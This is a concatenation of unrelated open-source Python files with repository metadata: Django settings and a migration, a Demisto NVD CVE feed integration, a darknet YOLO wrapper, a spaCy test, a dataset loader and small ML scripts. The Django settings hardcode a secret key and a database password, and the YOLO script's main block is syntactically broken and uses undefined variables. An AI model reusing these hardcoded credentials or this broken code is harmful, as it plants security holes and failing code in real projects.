ci_95_lower: float64, ci_95_upper: float64}")) register_function("floor", (dtype("float64"),), dtype("float64")) register_function("floor", (dtype("float32"),), dtype("float32")) register_function("isNonRef", (dtype("call"),), dtype("bool")) register_function("includesStart", (dtype("interval<?T>"),), dtype("bool")) register_function("isHetNonRef", (dtype("call"),), dtype("bool")) register_function("hardy_weinberg_test", (dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{het_freq_hwe: float64, p_value: float64}")) register_function("haplotype_freq_em", (dtype("array<int32>"),), dtype("array<float64>")) register_function("nNonRefAlleles", (dtype("call"),), dtype("int32")) register_function("abs", (dtype("float64"),), dtype("float64")) register_function("abs", (dtype("float32"),), dtype("float32")) register_function("abs", (dtype("int64"),), dtype("int64")) register_function("abs", (dtype("int32"),), dtype("int32")) register_function("endswith", (dtype("str"),dtype("str"),), dtype("bool")) register_function("sqrt", (dtype("float64"),), dtype("float64")) register_function("isnan", (dtype("float32"),), dtype("bool")) register_function("isnan", (dtype("float64"),), dtype("bool")) register_function("lower", (dtype("str"),), dtype("str")) register_seeded_function("rand_beta", (dtype("float64"),dtype("float64"),), dtype("float64")) register_seeded_function("rand_beta", (dtype("float64"),dtype("float64"),dtype("float64"),dtype("float64"),), dtype("float64")) register_function("toInt64", (dtype("bool"),), dtype("int64")) register_function("toInt64", (dtype("str"),), dtype("int64")) register_function("testCodeUnification2", (dtype("?x"),), dtype("?x")) register_function("contains", (dtype("str"),dtype("str"),), dtype("bool")) register_function("contains", (dtype("interval<?T>"),dtype("?T"),), dtype("bool")) register_function("entropy", (dtype("str"),), dtype("float64")) register_function("filtering_allele_frequency", (dtype("int32"),dtype("int32"),dtype("float64"),), dtype("float64")) register_function("gqFromPL", (dtype("array<?N:int32>"),), dtype("int32")) register_function("startswith", (dtype("str"),dtype("str"),), dtype("bool")) register_function("ceil", (dtype("float32"),), dtype("float32")) register_function("ceil", (dtype("float64"),), dtype("float64")) register_function("json", (dtype("?T"),), dtype("str")) register_function("strip", (dtype("str"),), dtype("str")) register_function("firstMatchIn", (dtype("str"),dtype("str"),), dtype("array<str>")) register_function("isEmpty", (dtype("interval<?T>"),), dtype("bool")) register_function("~", (dtype("str"),dtype("str"),), dtype("bool")) register_function("mkString", (dtype("set<str>"),dtype("str"),), dtype("str")) register_function("mkString", (dtype("array<str>"),dtype("str"),), dtype("str")) register_function("dosage", (dtype("array<?N:float64>"),), dtype("float64")) register_function("upper", (dtype("str"),), dtype("str")) register_function("overlaps", (dtype("interval<?T>"),dtype("interval<?T>"),), dtype("bool")) register_function("downcode", (dtype("call"),dtype("int32"),), dtype("call")) register_function("inXPar", (dtype("?T:locus"),), dtype("bool")) register_function("format", (dtype("str"),dtype("?T:tuple"),), dtype("str")) register_function("pnorm", (dtype("float64"),), dtype("float64")) register_function("is_infinite", (dtype("float32"),), dtype("bool")) register_function("is_infinite", (dtype("float64"),), dtype("bool")) register_function("isHetRef", (dtype("call"),), dtype("bool")) register_function("isMitochondrial", (dtype("?T:locus"),), dtype("bool")) register_function("hamming", (dtype("str"),dtype("str"),), dtype("int32")) register_function("end", (dtype("interval<?T>"),), dtype("?T")) register_function("start", (dtype("interval<?T>"),), dtype("?T")) register_function("inXNonPar", (dtype("?T:locus"),), dtype("bool")) register_function("escapeString", (dtype("str"),), dtype("str")) register_function("isHomRef", (dtype("call"),), dtype("bool")) register_seeded_function("rand_norm", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("chi_squared_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64}"))
3dab6d251c6ac13c212ea60b449bf66fc68e4008
48d86947d5f3b5896c4a05cfcddcff01582a26ef
/amnesia/task/migrations/0002_auto_20170504_2027.py
1792df7727f51e01362639cf36de2a20b7de1620
[]
no_license
pratulyab/amnesia
181874288c97fbf7e73d10c64e214c2a17574773
6b0b3428a27f98e0e2f6bb8aefdc8a4459e7b8cc
refs/heads/master
2021-01-20T12:49:16.592335
2017-05-07T20:38:06
2017-05-07T20:38:06
90,409,855
0
0
null
null
null
null
UTF-8
Python
false
false
908
py
# -*- coding: utf-8 -*- # Generated by Django 1.10 on 2017-05-04 20:27 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('task', '0001_initial'), ] operations = [ migrations.AlterField( model_name='task', name='every', field=models.CharField(choices=[('15', '15 minutes'), ('30', '30 minutes'), ('45', '45 minutes'), ('0', '60 minutes')], default='0', help_text='Repeat every', max_length=2), ), migrations.AlterField( model_name='task', name='sleep_cycle', field=models.CharField(choices=[('4-19', '8pm - 4am'), ('5-20', '9pm - 5am'), ('6-21', '10pm - 6am'), ('7-22', '11pm - 7am'), ('8-23', '12pm - 8am')], default='4-19', help_text='Assuming 8 hours sleep cycle', max_length=5), ), ]
d0c7559b7165c2f244c313b57474e26053f26554
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
/Packs/NationalVulnerabilityDatabaseFeed/Integrations/NationalVulnerabilityDatabaseFeed/NationalVulnerabilityDatabaseFeed.py
daa1e14306dcea7f4df316bec273e24e3104e8bc
[ "MIT" ]
permissive
demisto/content
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
refs/heads/master
2023-09-04T00:02:25.618032
2023-09-03T21:56:22
2023-09-03T21:56:22
60,525,392
1,023
1,921
MIT
2023-09-14T20:55:24
2016-06-06T12:17:02
Python
UTF-8
Python
false
false
12,285
py
import demistomock as demisto from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import from CommonServerUserPython import * # noqa from typing import Dict, Any, List from datetime import datetime, timedelta from time import sleep import urllib3 # Disable insecure warnings urllib3.disable_warnings() # pylint: disable=no-member ''' CONSTANTS ''' DATE_FORMAT = "%Y-%m-%dT%H:%M:%S:000 UTC-00:00" # ISO8601 format with UTC, default in XSOAR DEFAULT_LIMIT = 100 # =========================================== Helper Functions ===========================================# def parse_cve_data(item=None) -> dict: fields = dict() if item and isinstance(item, dict): # Populate common fields cve: dict = item.get('cve') # type: ignore # Description if "description" in cve: description = cve.get('description', {}).get('description_data') if "en" in [x.get('lang') for x in description]: fields['cvedescription'] = description[([x.get('lang') for x in description]).index('en')].get('value') # References if "references" in cve: references: List = cve.get('references', {}).get('reference_data') fields['publications'] = [ { "link": x.get('url'), "title": x.get('name'), "source": x.get('refsource') } for x in references] # Parse impact data impact = item.get('impact') if impact: # All CVSS data all_cvss = [] # Base Metric V2 if "impact" in impact: impact_v2 = impact.get('impact') if "baseMetricV2" in impact_v2: base_metric_v2 = impact_v2.get('baseMetricV2') if "cvssV2" in base_metric_v2: cvss_v2 = base_metric_v2.get('cvssV2') all_cvss.append({"cvssV2": cvss_v2}) # Base Metric V3 if "baseMetricV3" in impact: base_metric = impact.get('baseMetricV3') if "cvssV3" in base_metric: cvss_v3 = base_metric.get('cvssV3') all_cvss.append({"cvssV3": cvss_v3}) cvss_v3_data = [] for k, v in cvss_v3.items(): cvss_v3_data.append( { "metric": camel_case_to_underscore(k).replace("_", " ").title(), "values": v } ) fields['cvss3'] = cvss_v3_data fields['cvssvector'] = cvss_v3.get('vectorString') fields['cvss'] = all_cvss return fields def extract_titles(data_item={}) -> list: titles = [] for title in data_item.get('titles'): titles.append(title.get('title')) return titles def extract_descriptions(data_item={}) -> list: descriptions = [] for description in data_item.get('cve', {}).get('description', {}).get('description_data'): descriptions.append(description.get('value')) return descriptions # ========================================== Generic Query ===============================================# def test_module(client: BaseClient, params: Dict[str, Any]): api_key = params.get('apiKey') try: params = { "cveId": "CVE-2020-22120" } if api_key: params['apiKey'] = api_key res = client._http_request('GET', full_url='https://services.nvd.nist.gov/rest/json/cpes/1.0', params=params) if "error" in res: return_error((res.get('error'))) elif "resultsPerPage" in res: return_results('ok') except Exception as err: raise DemistoException(err) def fetch_indicators_command(client, params): command = demisto.command() api_key = params.get('apiKey') get_type = params.get('type') cpe_match_string = params.get('cpeMatchString') cpe_keyword = params.get('keyword') include_deprecated = params.get('deprecated') cvss_v2_metrics = params.get('cvssV2Metrics') cvss_v2_severity = params.get('cvssV2Severity') cvss_v3_metrics = params.get('cvssV3Metrics') cvss_v3_severity = params.get('cvssV3Severity') history = int(params.get('history')) exceeds_span = True urls = { "CPE": "/rest/json/cpes/1.0/", "CVE": "/rest/json/cves/1.0/" } url = urls[get_type] now = datetime.utcnow() startIndex = 0 resultsPerPage = 2000 data_items = [] indicators: List[Dict] = [] last_run_data = demisto.getLastRun() run_times: List[datetime] = [] run_limit = 9 # If there is no last run date, use the history specified in the params if "lastRun" not in last_run_data or command == 'nvd-get-indicators': last_run = (now - timedelta(days=history)) else: last_run = dateparser.parse(last_run_data.get('lastRun')) # type: ignore modStartDate = last_run modEndDate = now # API calls can only span 120 days, so we should loop if the history # parameter is greater than this while exceeds_span and modEndDate and modStartDate: delta = (modEndDate - modStartDate).days if delta > 120: modEndDate = modStartDate + timedelta(days=120) else: exceeds_span = False params = { "modStartDate": modStartDate.strftime(DATE_FORMAT), "modEndDate": modEndDate.strftime(DATE_FORMAT), "startIndex": startIndex, "resultsPerPage": resultsPerPage } if api_key: params['apiKey'] = api_key run_limit = 99 if get_type == "CPE": params['addOns'] = "cves" if include_deprecated: params['includeDeprecated'] = include_deprecated if get_type == "CVE": if cvss_v2_metrics: params['cvssV2Metrics'] = cvss_v2_metrics if cvss_v2_severity: params['cvssV2Severity'] = cvss_v2_severity if cvss_v3_metrics: params['cvssV3Metrics'] = cvss_v3_metrics if cvss_v3_severity: params['cvssV3Severity'] = cvss_v3_severity if cpe_match_string: params['cpeMatchString'] = cpe_match_string if cpe_keyword: params['keyword'] = cpe_keyword total_results = 1 collection_count = 0 # Collect all the indicators together while collection_count < total_results: # Check to ensure no rate limits are hit if len(run_times) == run_limit: first_time = run_times[0] last_time = run_times[(run_limit - 1)] if (last_time - first_time).seconds <= 60: demisto.info("Rate limit hit, sleeping for 3 seconds") # We sleep 3 seconds to avoid hitting any rate limits sleep(3) del run_times[0] run_times.append(datetime.utcnow()) res = client._http_request('GET', url, params=params, timeout=300) # Check to see if there are any errors if "error" in res: return_error(res.get('error')) total_results = res.get('totalResults', 0) resultsPerPage = res.get('resultsPerPage', 0) result = res.get('result') if result: if get_type == 'CPE': data_items += result.get('cpes') else: data_items += result.get('CVE_Items') params['startIndex'] += resultsPerPage collection_count += resultsPerPage modStartDate = modEndDate modEndDate = now # If this is nvd-get-indicators command: if command == 'nvd-get-indicators': # If they are CPEs if get_type == 'CPE': outputs = [ { "cpe23Uri": x.get('cpe23Uri'), "titles": ". ".join(extract_titles(data_item=x)), "vulnerabilities": ", ".join(x.get('vulnerabilities')) } for x in data_items ] command_results = CommandResults( outputs_prefix='CPE', outputs_key_field='cpe23Uri', outputs=data_items, readable_output=tableToMarkdown("National Vulnerability Database CPEs:", outputs) ) # If they are CVEs elif get_type == 'CVE': outputs = [ { "id": x.get('cve').get('CVE_data_meta').get('ID'), "description": ". ".join(extract_descriptions(data_item=x)) } for x in data_items] command_results = CommandResults( outputs_prefix='CVE', outputs_key_field='id', outputs=data_items, readable_output=tableToMarkdown("National Vulnerability Database CVEs:", outputs) ) return_results(command_results) # Else if this is fetch-indicators elif command == 'fetch-indicators': indicators = [] # If they are CPEs if get_type == 'CPE' and data_items: for item in data_items: item['type'] = "CPE" indicator = { "value": item.get('cpe23Uri'), "rawJSON": item } # This is reserved for future use if "vulnerabilities" in item: relationships = [] for vulnerability in item.get('vulnerabilities', []): relationship = EntityRelationship( name=EntityRelationship.Relationships.RELATED_TO, entity_a=item.get('cpe23Uri'), entity_a_family="Indicator", entity_a_type="CPE", entity_b=vulnerability, entity_b_family="Indicator", entity_b_type="CVE" ) relationships.append(relationship.to_indicator()) indicator['relationships'] = relationships indicators.append(indicator) # If they are CVEs elif get_type == 'CVE' and data_items: for item in data_items: item['type'] = "CVE" fields: Dict = parse_cve_data(item) indicators.append({ "value": item.get('cve', {}).get('CVE_data_meta', {}).get('ID'), "type": FeedIndicatorType.CVE, "fields": fields, "rawJSON": item }) # Create the indicators in a batch, 2000 at a time for b in batch(indicators, batch_size=2000): demisto.createIndicators(b) # Set new integration context demisto.setLastRun({"lastRun": now.isoformat()}) # =========================================== Built-In Queries ===========================================# ''' MAIN FUNCTION ''' # COMMAND CONSTANTS commands = { 'test-module': test_module, 'fetch-indicators': fetch_indicators_command, 'nvd-get-indicators': fetch_indicators_command } def main() -> None: params = demisto.params() base_url = "https://services.nvd.nist.gov" verify_cert = not params.get('insecure', False) proxy = params.get('proxy', False) command = demisto.command() demisto.debug(f'Command being called is {command}') try: client = BaseClient( base_url=base_url, verify=verify_cert, proxy=proxy, ) commands[command](client, params) # Log exceptions and return errors except Exception as e: demisto.error(traceback.format_exc()) # print the traceback return_error(f'Failed to execute {command} command.\nError: {str(e)}') ''' ENTRY POINT ''' if __name__ in ('__main__', '__builtin__', 'builtins'): main()
7f611c84c8e4bd5fbd87fdfe6e15165d7275e17f
f7bdda5ce6026e30f8d2258499d066cec0a9bf6a
/detect_object.py
03a40e8e061ac0b96d172f6b950f5f922d728bb4
[]
no_license
AbhishekBose/yolo_docker
cfb3e3fe3dda8092771f614bdd9ce3ea022435e1
1377a73b38a95cfdde37ddc215a6f90ecbd407b0
refs/heads/master
2022-06-25T21:14:51.702133
2019-12-15T15:30:19
2019-12-15T15:30:19
228,206,788
10
10
null
2022-06-01T20:54:18
2019-12-15T15:29:53
Python
UTF-8
Python
false
false
5,336
py
#%% from ctypes import * import random import argparse import os import traceback import cv2 import functools import numpy as np import time import sys import imutils #%% THIS_DIR = os.path.dirname(os.path.realpath(__file__)) def sample(probs): s = sum(probs) probs = [a/s for a in probs] r = random.uniform(0, 1) for i in range(len(probs)): r = r - probs[i] if r <= 0: return i return len(probs)-1 def c_array(ctype, values): arr = (ctype*len(values))() arr[:] = values return arr class BOX(Structure): _fields_ = [("x", c_float), ("y", c_float), ("w", c_float), ("h", c_float)] class DETECTION(Structure): _fields_ = [("bbox", BOX), ("classes", c_int), ("prob", POINTER(c_float)), ("mask", POINTER(c_float)), ("objectness", c_float), ("sort_class", c_int)] class IMAGE(Structure): _fields_ = [("w", c_int), ("h", c_int), ("c", c_int), ("data", POINTER(c_float))] class METADATA(Structure): _fields_ = [("classes", c_int), ("names", POINTER(c_char_p))] libdarknet_path = os.path.join("/home/darknet/libdarknet.so") lib = CDLL(libdarknet_path, RTLD_GLOBAL) lib.network_width.argtypes = [c_void_p] lib.network_width.restype = c_int lib.network_height.argtypes = [c_void_p] lib.network_height.restype = c_int predict = lib.network_predict predict.argtypes = [c_void_p, POINTER(c_float)] predict.restype = POINTER(c_float) set_gpu = lib.cuda_set_device set_gpu.argtypes = [c_int] make_image = lib.make_image make_image.argtypes = [c_int, c_int, c_int] make_image.restype = IMAGE get_network_boxes = lib.get_network_boxes get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)] get_network_boxes.restype = POINTER(DETECTION) make_network_boxes = lib.make_network_boxes make_network_boxes.argtypes = [c_void_p] make_network_boxes.restype = POINTER(DETECTION) free_detections = lib.free_detections free_detections.argtypes = [POINTER(DETECTION), c_int] free_ptrs = lib.free_ptrs free_ptrs.argtypes = [POINTER(c_void_p), c_int] network_predict = lib.network_predict network_predict.argtypes = [c_void_p, POINTER(c_float)] reset_rnn = lib.reset_rnn reset_rnn.argtypes = [c_void_p] load_net = lib.load_network load_net.argtypes = [c_char_p, c_char_p, c_int] load_net.restype = c_void_p do_nms_obj = lib.do_nms_obj do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float] do_nms_sort = lib.do_nms_sort do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float] free_image = lib.free_image free_image.argtypes = [IMAGE] letterbox_image = lib.letterbox_image letterbox_image.argtypes = [IMAGE, c_int, c_int] letterbox_image.restype = IMAGE load_meta = lib.get_metadata lib.get_metadata.argtypes = [c_char_p] lib.get_metadata.restype = METADATA load_image = lib.load_image_color load_image.argtypes = [c_char_p, c_int, c_int] load_image.restype = IMAGE rgbgr_image = lib.rgbgr_image rgbgr_image.argtypes = [IMAGE] predict_image = lib.network_predict_image predict_image.argtypes = [c_void_p, IMAGE] predict_image.restype = POINTER(c_float) def classify(net, meta, im): out = predict_image(net, im) res = [] for i in range(meta.classes): res.append((meta.names[i], out[i])) res = sorted(res, key=lambda x: -x[1]) return res def array_to_image(arr): # need to return old values to avoid python freeing memory arr = arr.transpose(2,0,1) c, h, w = arr.shape[0:3] arr = np.ascontiguousarray(arr.flat, dtype=np.float32) / 255.0 data = arr.ctypes.data_as(POINTER(c_float)) im = IMAGE(w,h,c,data) return im, arr def netdetect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45): im, image = array_to_image(image) rgbgr_image(im) num = c_int(0) pnum = pointer(num) predict_image(net, im) dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum) num = pnum[0] if (nms): do_nms_obj(dets, num, meta.classes, nms); res = [] for j in range(num): a = dets[j].prob[0:meta.classes] if any(a): ai = np.array(a).nonzero()[0] for i in ai: b = dets[j].bbox res.append((meta.names[i], dets[j].prob[i], (max(b.x,0), max(b.y,0), max(b.w,0), max(b.h,0)))) res = sorted(res, key=lambda x: -x[1]) if isinstance(image,bytes): free_image(im) free_detections(dets, num) return res #%% def convert_yolo_normal(x,y,w,h,s1,s2): b0=(2*x-w)/2 b1=w+b0 b2=(2*y-h)/2 b3=h+b2 return (int(b0),int(b1),int(b2),int(b3)) #%% if __name__ == "__main__": config_file = 'object_detector.config' with open('config.json') as f: data = json.load(f) weights_file = data['weights_file'] cfg_file = data['cfg_file'] obj_data = data['obj_file'] image_name = sys.argv[1] img = cv2.imread(image_name) netdet = load_net(cfg_file,weights_file,0) metadet = load_meta(obj_data) obj_res = netdetect(netlp,metalp, veh,0.7) for obj_res: print('All detected objects are:: ') for i in range(len(obj_res)): print(obj_res[i][0])
129e029f51e6c808b38cbff8b551f38366f41e0c
0726e305f3a7b57e8837ddcd334148ec68e9d2de
/portfolio/settings.py
79f45073c3745b1bc73328e6685fcf08e83d4536
[ "MIT" ]
permissive
Brian23-eng/portfolio-1
873448172532c0dd82de496911ad509022189db1
70ec48288fadf803a166f70728adfb1a61916a6d
refs/heads/master
2022-09-24T21:26:13.670066
2020-01-23T05:36:20
2020-01-23T05:36:20
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,673
py
""" Django settings for portfolio project. Generated by 'django-admin startproject' using Django 3.0.2. For more information on this file, see https://docs.djangoproject.com/en/3.0/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.0/ref/settings/ """ import os import django_heroku # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'y#k96$zi!2uc9@tj#bvr0smlxx1v)2dcff447#%=kwn)$4(*1i' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'portfolio.myportfolio', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'whitenoise.middleware.WhiteNoiseMiddleware', 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'portfolio.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'portfolio.wsgi.application' # Database # https://docs.djangoproject.com/en/3.0/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql', 'NAME': 'portfolio', 'USER': 'moringa', 'PASSWORD': 'p@$$w0rd', } } # Password validation # https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.0/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.0/howto/static-files/ STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles') STATIC_URL = '/static/' # Extra places for collectstatic to find static files. STATICFILES_DIRS = ( os.path.join(BASE_DIR, 'static'), ) STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage' # configuring the location for media MEDIA_URL = '/project_images/' MEDIA_ROOT = os.path.join(BASE_DIR, 'project_images') # Configure Django app for Heroku django_heroku.settings(locals())
953b813584667bf1bd1e285fa7bdb8d4caa9ffa5
9bb18febdfc911a88756afd9490526f8e7929bfc
/spacy/tests/regression/test_issue3951.py
f9912c494ec18b830006793bd039c8ffa525a4cc
[ "MIT" ]
permissive
ashaffer/spaCy
3c28c7c8422fd4072bd3d472e796994d3269cf9f
ec0beccaf13eef263feec27e820136ad1e270bd4
refs/heads/master
2020-07-05T23:42:00.467234
2019-08-16T16:39:25
2019-08-16T16:39:25
202,819,156
1
0
MIT
2019-08-17T01:06:11
2019-08-17T01:06:10
null
UTF-8
Python
false
false
585
py
# coding: utf8 from __future__ import unicode_literals import pytest from spacy.matcher import Matcher from spacy.tokens import Doc @pytest.mark.xfail def test_issue3951(en_vocab): """Test that combinations of optional rules are matched correctly.""" matcher = Matcher(en_vocab) pattern = [ {"LOWER": "hello"}, {"LOWER": "this", "OP": "?"}, {"OP": "?"}, {"LOWER": "world"}, ] matcher.add("TEST", None, pattern) doc = Doc(en_vocab, words=["Hello", "my", "new", "world"]) matches = matcher(doc) assert len(matches) == 0
de5ec83749603d84453db9285e68d7d64b0f4369
8edd63a42469bf09fcad1c1070995ceda6e49646
/env/lib/python2.7/site-packages/observations/r/phosphate.py
6977f1f13f9f2bdb88341269c503dcf9123103b4
[]
no_license
silky/bell-ppls
fa0b5418f40dab59de48b7220ff30caba5945b56
369e7602c810b694a70ac1e875017480c8910ac8
refs/heads/master
2020-04-06T08:40:28.588492
2018-11-01T06:51:33
2018-11-01T06:51:33
157,312,221
1
0
null
2018-11-13T03:04:18
2018-11-13T03:04:18
null
UTF-8
Python
false
false
1,835
py
# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import csv import numpy as np import os import sys from observations.util import maybe_download_and_extract def phosphate(path): """Phosphate Level Data Plasma inorganic phosphate levels from 33 subjects. A data frame with 33 observations on the following 9 variables. `group` a factor with levels `control` and `obese`. `t0` baseline phosphate level , `t0.5` phosphate level after 1/2 an hour. `t1` phosphate level after one an hour. `t1.5` phosphate level after 1 1/2 hours. `t2` phosphate level after two hours. `t3` phosphate level after three hours. `t4` phosphate level after four hours. `t5` phosphate level after five hours. C. S. Davis (2002), *Statistical Methods for the Analysis of Repeated Measurements*, Springer, New York. Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `phosphate.csv`. Returns: Tuple of np.ndarray `x_train` with 33 rows and 9 columns and dictionary `metadata` of column headers (feature names). """ import pandas as pd path = os.path.expanduser(path) filename = 'phosphate.csv' if not os.path.exists(os.path.join(path, filename)): url = 'http://dustintran.com/data/r/HSAUR/phosphate.csv' maybe_download_and_extract(path, url, save_file_name='phosphate.csv', resume=False) data = pd.read_csv(os.path.join(path, filename), index_col=0, parse_dates=True) x_train = data.values metadata = {'columns': data.columns} return x_train, metadata
c733d23c52b223a95360a77acfa2c1924f9cc877
9433ce01c6e2906c694b6f0956a4640e1872d4d2
/src/main/python/wdbd/codepool/numpy/np_ployfit.py
7f5cd81f4002e97e948a3b8be95f2be36410229a
[]
no_license
shwdbd/python_codepool
fcd7950fc1339994186461ae18c34cee238938ee
92a4fb61d060f9a545499b6b7f99a4dc211d5009
refs/heads/master
2023-02-20T19:49:23.677824
2022-06-15T08:53:51
2022-06-15T08:53:51
209,431,254
0
1
null
2023-02-15T21:58:53
2019-09-19T00:56:03
Python
UTF-8
Python
false
false
344
py
#!/usr/bin/env python # -*- encoding: utf-8 -*- ''' @File : np_ployfit.py @Time : 2019/11/06 14:24:55 @Author : Jeffrey Wang @Version : 1.0 @Contact : [email protected] @Desc : 拟合函数 1. fit_1z 一阶函数拟合 2. fit_2z 二阶函数拟合 ? 如何评价拟合效果 ''' # here put the import lib
4f933506f4af1143b9acc28db9a09d38ec4467de
4eab0329e5bf8b91e3305eaf9202de107cfe889b
/notebooks/data8_notebooks/lab04/tests/q2_3.py
bd02b5e36213b04e7d67c069acfcddca70a09933
[ "MIT", "BSD-3-Clause" ]
permissive
y1ngyang/jupyterhub_AWS_deployment
e638f489ad1b70962204f4355eb2a7c4fc97dc7d
8172d63d94894774ec29f427ab5eeec637c923f4
refs/heads/master
2023-04-15T16:00:11.948307
2018-05-18T20:16:37
2018-05-18T20:16:37
134,009,971
0
0
BSD-3-Clause
2023-04-04T00:27:55
2018-05-18T22:33:34
Jupyter Notebook
UTF-8
Python
false
false
375
py
test = { 'name': '', 'points': 1, 'suites': [ { 'cases': [ { 'code': r""" >>> disemvowel("Datascience rules!") == "Dtscnc rls!" True """, 'hidden': False, 'locked': False }, ], 'scored': True, 'setup': '', 'teardown': '', 'type': 'doctest' } ] }
46d07128a604bf41698eb408598644429535db5b
77e8b7bc211624687eb61fdb071020642b2c0080
/machinelearning/f16.py
843de75f00d51c7741c5309feaa61e2e095f6c40
[]
no_license
wherby/hackerrank
fab46ea208042ce8055c2755545896bf69f88895
84345f56690ea6b1d5db181b12d2a2669007456c
refs/heads/master
2020-09-26T23:53:06.841052
2019-09-15T12:11:43
2019-09-15T12:11:43
67,225,970
0
0
null
null
null
null
UTF-8
Python
false
false
1,412
py
import numpy as np from math import sqrt import matplotlib.pyplot as plt import warnings from matplotlib import style from collections import Counter style.use('fivethirtyeight') dataset ={'k': [[1,2],[2,3],[3,1]], 'r': [[6,5], [7,7,],[8,6]]} new_feature = [5,7] # for i in dataset: # for ii in dataset[i]: # plt.scatter(ii[0],ii[1],s =100, color =i) # [[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset] # plt.scatter(new_feature[0], new_feature[1]) # plt.show() def k_nearest_neighbors(data, predict, k =3): if len(data) >=k: warnings.warn('k is set to value less than totoal voting groups') distances = [] for group in data: for features in data[group]: #euclidean_distance = np.sqrt(np.sum((np.array(features) - np.array(predict)) **2)) euclidean_distance = np.linalg.norm(np.array(features) - np.array(predict)) distances.append([euclidean_distance, group]) votes = [ i[1] for i in sorted(distances)[:k]] #print(sorted(distances)) #print( Counter(votes).most_common(1)) vote_result = Counter(votes).most_common(1)[0][0] return vote_result result = k_nearest_neighbors(dataset, new_feature , k =3) print result [[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset] plt.scatter(new_feature[0], new_feature[1],color = result) plt.show()
b20ca1afe34ac874e9dd05a205c75d038f6ea7b0
1ae03694e6826c2c3224647024f66debcebd62dc
/matlab/+robust_andrews_kernel/balance_scale/metrics.py
d78e052129030ea9de8d3552ad6679f6790d35df
[ "Apache-2.0" ]
permissive
Joaggi/Robust-kernels-for-robust-location-estimation
5ad7f8f3be9a08e5d4283e03e017e5e3b9b186b8
9db62273de90547c982d819dc45e66ac86bfcb58
refs/heads/master
2023-04-17T22:41:01.652426
2022-08-02T23:43:31
2022-08-02T23:43:31
27,465,913
3
1
null
2022-08-02T23:39:44
2014-12-03T02:49:24
MATLAB
UTF-8
Python
false
false
686
py
# -*- coding: utf-8 -*- """ Created on Wed Jul 16 15:50:05 2014 @author: Alejandro """ import scipy.io as sio import os, sys lib_path = os.path.abspath('G:/Dropbox/Universidad/Machine Learning') sys.path.append(lib_path) import numpy as np import Algorithms.Python.Metrics as Metrics import Robustes.Experiments.metrics_over_labels as metrics_over_labels dictionary = { 'Kernelconvexnmf':0, 'KernelKMeans':0, 'Kernelseminmfnnls':0, 'Kernelseminmfrule':0, 'KMeans':0, 'NNMF':0, 'RMNMF':1 } labels_name = 'balance-scale-labels' metrics_over_labels.metrics('G:/Dropbox/Universidad/Machine Learning/Robustes/BalanceScale/',dictionary,labels_name)